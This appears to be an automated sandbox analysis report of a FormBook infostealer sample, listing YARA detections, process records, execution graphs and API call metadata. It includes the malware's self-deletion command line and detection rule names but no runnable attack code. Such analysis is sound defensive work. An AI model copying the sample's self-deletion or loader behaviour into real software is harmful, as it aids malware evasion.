                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate
                                                    Has exited:false

                                                    General

                                                    Target ID:6
                                                    Start time:04:52:15
                                                    Start date:19/07/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"
                                                    Imagebase:0xa40000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:04:52:15
                                                    Start date:19/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:5.7%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:75
                                                      Total number of Limit Nodes:4
                                                      execution_graph 16382 2f9dff8 16383 2f9e03e 16382->16383 16386 2f9e1d8 16383->16386 16389 2f9d8d0 16386->16389 16390 2f9e240 DuplicateHandle 16389->16390 16391 2f9e12b 16390->16391 16392 2f9bf60 16393 2f9bfa8 GetModuleHandleW 16392->16393 16394 2f9bfa2 16392->16394 16395 2f9bfd5 16393->16395 16394->16393 16396 2f947b0 16397 2f947bf 16396->16397 16401 2f94fd8 16396->16401 16406 2f94724 16397->16406 16399 2f9493e 16402 2f94ffd 16401->16402 16410 2f950e8 16402->16410 16414 2f950d7 16402->16414 16407 2f9472f 16406->16407 16422 2f9693c 16407->16422 16409 2f98028 16409->16399 16411 2f9510f 16410->16411 16412 2f951ec 16411->16412 16418 2f94ce0 16411->16418 16416 2f9510f 16414->16416 16415 2f951ec 16415->16415 16416->16415 16417 2f94ce0 CreateActCtxA 16416->16417 16417->16415 16419 2f96178 CreateActCtxA 16418->16419 16421 2f9623b 16419->16421 16423 2f96947 16422->16423 16426 2f97c14 16423->16426 16425 2f9814d 16425->16409 16427 2f97c1f 16426->16427 16430 2f97c44 16427->16430 16429 2f98222 16429->16425 16431 2f97c4f 16430->16431 16434 2f97c74 16431->16434 16433 2f98325 16433->16429 16435 2f97c7f 16434->16435 16437 2f99593 16435->16437 16440 2f9bc4a 16435->16440 16436 2f995d1 16436->16433 16437->16436 16444 2f9dd30 16437->16444 16448 2f9bc78 16440->16448 16451 2f9bc68 16440->16451 16441 2f9bc56 16441->16437 16445 2f9dd51 16444->16445 16446 2f9dd75 16445->16446 16472 2f9dee0 16445->16472 16446->16436 16455 2f9bd62 16448->16455 16449 2f9bc87 16449->16441 16452 2f9bc78 16451->16452 16454 2f9bd62 LoadLibraryExW 16452->16454 16453 2f9bc87 16453->16441 16454->16453 16456 2f9bd81 16455->16456 16457 2f9bd9c 16455->16457 16456->16457 16460 2f9c008 16456->16460 16464 2f9bff8 16456->16464 16457->16449 16461 2f9c01c 16460->16461 16463 2f9c041 16461->16463 16468 2f9b7a0 16461->16468 16463->16457 16465 2f9c008 16464->16465 16466 2f9c041 16465->16466 16467 2f9b7a0 LoadLibraryExW 16465->16467 16466->16457 16467->16466 16469 2f9c1e8 LoadLibraryExW 16468->16469 16471 2f9c261 16469->16471 16471->16463 16474 2f9deed 16472->16474 16473 2f9df27 16473->16446 16474->16473 16476 2f9d808 16474->16476 16477 2f9d813 16476->16477 16479 2f9e838 16477->16479 16480 2f9d934 16477->16480 16481 2f9d93f 16480->16481 16482 2f97c74 LoadLibraryExW 16481->16482 16483 2f9e8a7 16482->16483 16483->16479

                                                      Executed Functions

                                                      Function 02F9616D Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 17 2f9616d-2f96239 CreateActCtxA 19 2f9623b-2f96241 17->19 20 2f96242-2f9629c 17->20 19->20 27 2f962ab-2f962af 20->27 28 2f9629e-2f962a1 20->28 29 2f962b1-2f962bd 27->29 30 2f962c0 27->30 28->27 29->30 32 2f962c1 30->32 32->32
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 02F96229
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1388000590.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2f90000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: ebbdfcbd8268f340328aad02934f50223be726e48a81efa648dae91174054917
                                                      • Instruction ID: 3413e4b46f0aa8a9251d44cbe831f548c2f9da86a982a6dcb69d001b78fcc9f8
                                                      • Opcode Fuzzy Hash: ebbdfcbd8268f340328aad02934f50223be726e48a81efa648dae91174054917
                                                      • Instruction Fuzzy Hash: 96411FB1C00319CFEF24DFA9C84478EBBB5BF89304F24805AC508AB250DB716946CF90
                                                      Function 02F94CE0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 2f94ce0-2f96239 CreateActCtxA 3 2f9623b-2f96241 0->3 4 2f96242-2f9629c 0->4 3->4 11 2f962ab-2f962af 4->11 12 2f9629e-2f962a1 4->12 13 2f962b1-2f962bd 11->13 14 2f962c0 11->14 12->11 13->14 16 2f962c1 14->16 16->16
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 02F96229
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1388000590.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2f90000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 8f8964712a3768d570113340485ffc67e76ede950a25903a506f81c3ca343d4e
                                                      • Instruction ID: 6acba0cbd2c42cb54087fd8bbdab381f256506e4b956ca38239fa8109143b916
                                                      • Opcode Fuzzy Hash: 8f8964712a3768d570113340485ffc67e76ede950a25903a506f81c3ca343d4e
                                                      • Instruction Fuzzy Hash: EC411EB0D00719CFEF24DFA9C844B9EBBB5BF89704F20806AD508AB250DB716945CF90
                                                      Function 02F9B788 Relevance: 1.6, APIs: 1, Instructions: 70libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 33 2f9b788-2f9b791 35 2f9b793-2f9c228 33->35 36 2f9b7f7-2f9b884 33->36 39 2f9c22a-2f9c22d 35->39 40 2f9c230-2f9c25f LoadLibraryExW 35->40 39->40 41 2f9c268-2f9c285 40->41 42 2f9c261-2f9c267 40->42 42->41
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02F9C041,00000800,00000000,00000000), ref: 02F9C252
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1388000590.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2f90000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: e165e72c0dd77228d20d99c1b6ddf8ba6683c93e425765a7ad0cf191d6888054
                                                      • Instruction ID: 64ca676c134114bdbf13e90a6226afa4756423ead9c8099bd57ba3c431714e64
                                                      • Opcode Fuzzy Hash: e165e72c0dd77228d20d99c1b6ddf8ba6683c93e425765a7ad0cf191d6888054
                                                      • Instruction Fuzzy Hash: 722198B2C043488FEB11CFAAC844BDEBFF4EB99710F04805AD559AB201C3749545CFA6
                                                      Function 02F9D8D0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 45 2f9d8d0-2f9e2d4 DuplicateHandle 47 2f9e2dd-2f9e2fa 45->47 48 2f9e2d6-2f9e2dc 45->48 48->47
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02F9E206,?,?,?,?,?), ref: 02F9E2C7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1388000590.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2f90000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 78927fdaea7175e611d7aeb5582783064fb8cbed125bd67eb77230be6167f6d3
                                                      • Instruction ID: 263f0de934420d246a2f03dd4dd907a233b7731bf65b221480f96b52aa914136
                                                      • Opcode Fuzzy Hash: 78927fdaea7175e611d7aeb5582783064fb8cbed125bd67eb77230be6167f6d3
                                                      • Instruction Fuzzy Hash: D521D2B5D002499FDB10CFAAD884AEEBBF9EB48310F14845AE914A3350D374A954CFA5
                                                      Function 02F9C1E0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 59 2f9c1e0-2f9c228 61 2f9c22a-2f9c22d 59->61 62 2f9c230-2f9c25f LoadLibraryExW 59->62 61->62 63 2f9c268-2f9c285 62->63 64 2f9c261-2f9c267 62->64 64->63
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02F9C041,00000800,00000000,00000000), ref: 02F9C252
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1388000590.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2f90000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 671874c81f9e91973715b0ad2f3ff734afcd196743c86c0637e5abc9011cb0f3
                                                      • Instruction ID: a374028185d8e589abc152cad724754f2692f292eccc4f025414f8fc7e98af85
                                                      • Opcode Fuzzy Hash: 671874c81f9e91973715b0ad2f3ff734afcd196743c86c0637e5abc9011cb0f3
                                                      • Instruction Fuzzy Hash: 051112B6D003499FDB10CFAAC884BDEFBF5EB88720F14842AE519A7200C375A545CFA1
                                                      Function 02F9B7A0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 51 2f9b7a0-2f9c228 53 2f9c22a-2f9c22d 51->53 54 2f9c230-2f9c25f LoadLibraryExW 51->54 53->54 55 2f9c268-2f9c285 54->55 56 2f9c261-2f9c267 54->56 56->55
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02F9C041,00000800,00000000,00000000), ref: 02F9C252
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1388000590.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2f90000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: c19b1fd1808da6bdc550fdd975142667b919fb6994f6ca07d7760b52881d3f1a
                                                      • Instruction ID: 03ce8c5591da22d45f5847c19b91bfefa0ddc971ea51ee1eb1f9517521466237
                                                      • Opcode Fuzzy Hash: c19b1fd1808da6bdc550fdd975142667b919fb6994f6ca07d7760b52881d3f1a
                                                      • Instruction Fuzzy Hash: 901114B6D003498FDB10DF9AC444B9EFBF4EB88710F10842ED919A7200C375A545CFA5
                                                      Function 02F9BF5A Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 67 2f9bf5a-2f9bfa0 69 2f9bfa8-2f9bfd3 GetModuleHandleW 67->69 70 2f9bfa2-2f9bfa5 67->70 71 2f9bfdc-2f9bff0 69->71 72 2f9bfd5-2f9bfdb 69->72 70->69 72->71
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02F9BFC6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1388000590.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2f90000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 99b4faed1790f9b25c3cbd326fe3e5a86605b3916ca08047eaf8ba52ea313fa9
                                                      • Instruction ID: ab36c8a7714fa31a6f3e00ec9a2639489fd650700bf5a1df549901760bae124e
                                                      • Opcode Fuzzy Hash: 99b4faed1790f9b25c3cbd326fe3e5a86605b3916ca08047eaf8ba52ea313fa9
                                                      • Instruction Fuzzy Hash: 70113FB2C002098FDB10DF9AD844BDEFBF4EB88228F10841AD828B3600C378A545CFA1
                                                      Function 02F9BF60 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 74 2f9bf60-2f9bfa0 75 2f9bfa8-2f9bfd3 GetModuleHandleW 74->75 76 2f9bfa2-2f9bfa5 74->76 77 2f9bfdc-2f9bff0 75->77 78 2f9bfd5-2f9bfdb 75->78 76->75 78->77
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02F9BFC6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1388000590.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2f90000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 6f07e6b47e158d272f2c8dd4223713a5c8a50a10e81b4c506cd7dc61ebe60ae6
                                                      • Instruction ID: dcc24a638cf7fc82f9e7634eb4b1cb8f82ede01ee3c3e00fb12d7b2d56767ddf
                                                      • Opcode Fuzzy Hash: 6f07e6b47e158d272f2c8dd4223713a5c8a50a10e81b4c506cd7dc61ebe60ae6
                                                      • Instruction Fuzzy Hash: B5110FB5C002498FDB14DF9AD444B9EFBF4AB88228F10841AD928A7640C379A545CFA1
                                                      Function 013BD4C4 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1387105601.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_13bd000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0435ebfe470dcd4db114b241a68f0d48c8df1e181d1a47392b4222a2030c3b88
                                                      • Instruction ID: d3e0e2f3def221c7425aa635e163b4cc686785aaf4fdd26038b27e489bf1a29d
                                                      • Opcode Fuzzy Hash: 0435ebfe470dcd4db114b241a68f0d48c8df1e181d1a47392b4222a2030c3b88
                                                      • Instruction Fuzzy Hash: C0213371604204DFDB01DF54D9C0B66BF65FBC832CF20C16AEA090BA46D33AD406CBA2
                                                      Function 013CD01C Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1387173794.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_13cd000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: daf45b22ee472c8534d1fdcadf6eb42b7ef759b1dd40bbd1cdf08021785eaf3a
                                                      • Instruction ID: e5cba209a47b95c00c33ffe002f65789f262f7407e7404cfc57f7a2aa5d13e7a
                                                      • Opcode Fuzzy Hash: daf45b22ee472c8534d1fdcadf6eb42b7ef759b1dd40bbd1cdf08021785eaf3a
                                                      • Instruction Fuzzy Hash: B4210075604304DFDB15DF58D884B16BBA5FB84A28F20C57DE84A0B686C33AD807CBA2
                                                      Function 013CD1D4 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1387173794.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_13cd000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6281f05c83a70ae62ef76beb74ac0b34e5029730a492c91b871fc1b609083543
                                                      • Instruction ID: e743e97ec97800d4a1c703604cd2eef94f56a61f883772ac1c7cc505b81aba99
                                                      • Opcode Fuzzy Hash: 6281f05c83a70ae62ef76beb74ac0b34e5029730a492c91b871fc1b609083543
                                                      • Instruction Fuzzy Hash: DE21F575604304DFDB05DF94D9C4B26BB66FB84B28F20C57DE8494B652C336D846CBA1
                                                      Function 013CD006 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1387173794.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_13cd000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ef5f85a1d6f5dc7d4911a82bf3f85561a5e9085d1f8f20c35e8e0f439b4b68aa
                                                      • Instruction ID: c2e5b89909fbbbfac9f5c0e42e7888ca78a74c11458140f0e32f26d37a889cc0
                                                      • Opcode Fuzzy Hash: ef5f85a1d6f5dc7d4911a82bf3f85561a5e9085d1f8f20c35e8e0f439b4b68aa
                                                      • Instruction Fuzzy Hash: 1B2162755083849FCB03CF58D994711BF71EB46614F28C5EED8498F2A7C33A9856CBA2
                                                      Function 013BD4BF Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1387105601.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_13bd000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                      • Instruction ID: a4971d703f12162160fcb819a2d68ad6801839971dac405eb51347a6f42ca4e0
                                                      • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                      • Instruction Fuzzy Hash: 9B110376504284CFCB02CF54D5C0B56BF72FB84328F24C6AAD9490B657C33AD456CBA1
                                                      Function 013CD1CF Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1387173794.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_13cd000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                      • Instruction ID: 051884501f179760eb1d4415144b9ea62b2e42ddc01dba6f41d37c16defa6f55
                                                      • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                      • Instruction Fuzzy Hash: 9311BE76504240DFCB02CF54C5C0B15BB72FB84628F24C6ADE8494B296C33AD80ACB91

                                                      Non-executed Functions

                                                      Function 02F9D5B0 Relevance: .2, Instructions: 201COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1388000590.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2f90000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 13b996c647a2f96c1c9cd733baebff8f07520263b3bc29258da3ba8cf6a634fc
                                                      • Instruction ID: 2178b064c059d73be870a91f295f6f942e947b367076200c94c95b27dc63e575
                                                      • Opcode Fuzzy Hash: 13b996c647a2f96c1c9cd733baebff8f07520263b3bc29258da3ba8cf6a634fc
                                                      • Instruction Fuzzy Hash: BA613BB29053849FEF02EF75D4893A97FA0BF5A394F2844CEC6859B262D2748501DF52

                                                      Execution Graph

                                                      Execution Coverage:1.4%
                                                      Dynamic/Decrypted Code Coverage:2.7%
                                                      Signature Coverage:5.9%
                                                      Total number of Nodes:562
                                                      Total number of Limit Nodes:70
                                                      execution_graph 99489 1102ad0 LdrInitializeThunk 99492 41f070 99493 41f07b 99492->99493 99495 41b970 99492->99495 99496 41b996 99495->99496 99503 409d30 99496->99503 99498 41b9a2 99499 41b9c3 99498->99499 99511 40c1b0 99498->99511 99499->99493 99501 41b9b5 99547 41a6b0 99501->99547 99504 409d3d 99503->99504 99550 409c80 99503->99550 99506 409d44 99504->99506 99562 409c20 99504->99562 99506->99498 99512 40c1d5 99511->99512 99983 40b1b0 99512->99983 99514 40c22c 99987 40ae30 99514->99987 99516 40c252 99546 40c4a3 99516->99546 99996 414390 99516->99996 99518 40c297 99518->99546 99999 408a60 99518->99999 99520 40c2db 99520->99546 100006 41a500 99520->100006 99524 40c331 99525 40c338 99524->99525 100018 41a010 99524->100018 99527 41bdc0 2 API calls 99525->99527 99529 40c345 99527->99529 99529->99501 99530 40c382 99531 41bdc0 2 API calls 99530->99531 99532 40c389 99531->99532 99532->99501 99533 40c392 99534 40f490 3 API calls 99533->99534 99535 40c406 99534->99535 99535->99525 99536 40c411 99535->99536 99537 41bdc0 2 API calls 99536->99537 99538 40c435 99537->99538 100023 41a060 99538->100023 99541 41a010 2 API calls 99542 40c470 99541->99542 99542->99546 100028 419e20 99542->100028 99545 41a6b0 2 API calls 99545->99546 99546->99501 99548 41a6cf ExitProcess 99547->99548 99549 41af60 LdrLoadDll 99547->99549 99549->99548 99581 418bc0 99550->99581 99554 409ca6 99554->99504 99555 409c9c 99555->99554 99588 41b2b0 99555->99588 99557 409ce3 99557->99554 99599 409aa0 99557->99599 99559 409d03 99605 409620 LdrLoadDll 99559->99605 99561 409d15 99561->99504 99957 41b5a0 99562->99957 99565 41b5a0 LdrLoadDll 99566 409c4b 99565->99566 99567 41b5a0 LdrLoadDll 99566->99567 99568 409c61 99567->99568 99569 40f170 99568->99569 99570 40f189 99569->99570 99966 40b030 99570->99966 99572 40f19c 99970 41a1e0 99572->99970 99575 409d55 99575->99498 99577 40f1c2 99578 40f1ed 99577->99578 99976 41a260 99577->99976 99580 41a490 2 API calls 99578->99580 99580->99575 99582 418bcf 99581->99582 99606 414e40 99582->99606 99584 409c93 99585 418a70 99584->99585 99612 41a600 99585->99612 99589 41b2c9 99588->99589 99619 414a40 99589->99619 99591 41b2e1 99592 41b2ea 99591->99592 99658 41b0f0 99591->99658 99592->99557 99594 41b2fe 99594->99592 99676 419f00 99594->99676 99597 41b332 99597->99597 99681 41bdc0 99597->99681 99602 409aba 99599->99602 99935 407ea0 99599->99935 99601 409ac1 99601->99559 99602->99601 99948 408160 99602->99948 99605->99561 99607 414e5a 99606->99607 99608 414e4e 99606->99608 99607->99584 99608->99607 99611 4152c0 LdrLoadDll 99608->99611 99610 414fac 99610->99584 99611->99610 99613 418a85 99612->99613 99615 41af60 99612->99615 99613->99555 99616 41af70 99615->99616 99617 41af92 99615->99617 99618 414e40 LdrLoadDll 99616->99618 99617->99613 99618->99617 99620 414d75 99619->99620 99622 414a54 99619->99622 99620->99591 99622->99620 99684 419c50 99622->99684 99624 414b80 99687 41a360 99624->99687 99625 414b63 99744 41a460 LdrLoadDll 99625->99744 99628 414b6d 99628->99591 99629 414ba7 99630 41bdc0 2 API calls 99629->99630 99632 414bb3 99630->99632 99631 414d39 99634 41a490 2 API calls 99631->99634 99632->99628 99632->99631 99633 414d4f 99632->99633 99638 414c42 99632->99638 99753 414780 LdrLoadDll NtReadFile NtClose 99633->99753 99635 414d40 99634->99635 99635->99591 99637 414d62 99637->99591 99639 414ca9 99638->99639 99641 414c51 99638->99641 99639->99631 99640 414cbc 99639->99640 99746 41a2e0 99640->99746 99643 414c56 99641->99643 99644 414c6a 99641->99644 99745 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 99643->99745 99647 414c87 99644->99647 99648 414c6f 99644->99648 99647->99635 99702 414400 99647->99702 99690 4146e0 99648->99690 99650 414c60 99650->99591 99652 414d1c 99750 41a490 99652->99750 99653 414c7d 99653->99591 99656 414c9f 99656->99591 99657 414d28 99657->99591 99660 41b101 99658->99660 99659 41b113 99659->99594 99660->99659 99771 41bd40 99660->99771 99662 41b134 99775 414060 99662->99775 99664 41b180 99664->99594 99665 41b157 99665->99664 99666 414060 3 API calls 99665->99666 99669 41b179 99666->99669 99668 41b20a 99670 41b21a 99668->99670 99901 41af00 LdrLoadDll 99668->99901 99669->99664 99807 415380 99669->99807 99817 41ad70 99670->99817 99673 41b248 99896 419ec0 99673->99896 99677 41af60 LdrLoadDll 99676->99677 99678 419f1c 99677->99678 99929 1102c0a 99678->99929 99679 419f37 99679->99597 99932 41a670 99681->99932 99683 41b359 99683->99557 99685 41af60 LdrLoadDll 99684->99685 99686 414b34 99685->99686 99686->99624 99686->99625 99686->99628 99688 41af60 LdrLoadDll 99687->99688 99689 41a37c NtCreateFile 99688->99689 99689->99629 99691 4146fc 99690->99691 99692 41a2e0 LdrLoadDll 99691->99692 99693 41471d 99692->99693 99694 414724 99693->99694 99695 414738 99693->99695 99697 41a490 2 API calls 99694->99697 99696 41a490 2 API calls 99695->99696 99698 414741 99696->99698 99699 41472d 99697->99699 99754 41bfd0 LdrLoadDll RtlAllocateHeap 99698->99754 99699->99653 99701 41474c 99701->99653 99703 41444b 99702->99703 99704 41447e 99702->99704 99706 41a2e0 LdrLoadDll 99703->99706 99705 4145c9 99704->99705 99710 41449a 99704->99710 99707 41a2e0 LdrLoadDll 99705->99707 99708 414466 99706->99708 99714 4145e4 99707->99714 99709 41a490 2 API calls 99708->99709 99711 41446f 99709->99711 99712 41a2e0 LdrLoadDll 99710->99712 99711->99656 99713 4144b5 99712->99713 99716 4144d1 99713->99716 99717 4144bc 99713->99717 99767 41a320 LdrLoadDll 99714->99767 99720 4144d6 99716->99720 99721 4144ec 99716->99721 99719 41a490 2 API calls 99717->99719 99718 41461e 99722 41a490 2 API calls 99718->99722 99723 4144c5 99719->99723 99724 41a490 2 API calls 99720->99724 99730 4144f1 99721->99730 99755 41bf90 99721->99755 99726 414629 99722->99726 99723->99656 99727 4144df 99724->99727 99725 414503 99725->99656 99726->99656 99727->99656 99730->99725 99758 41a410 99730->99758 99731 414557 99737 41456e 99731->99737 99766 41a2a0 LdrLoadDll 99731->99766 99732 414575 99735 41a490 2 API calls 99732->99735 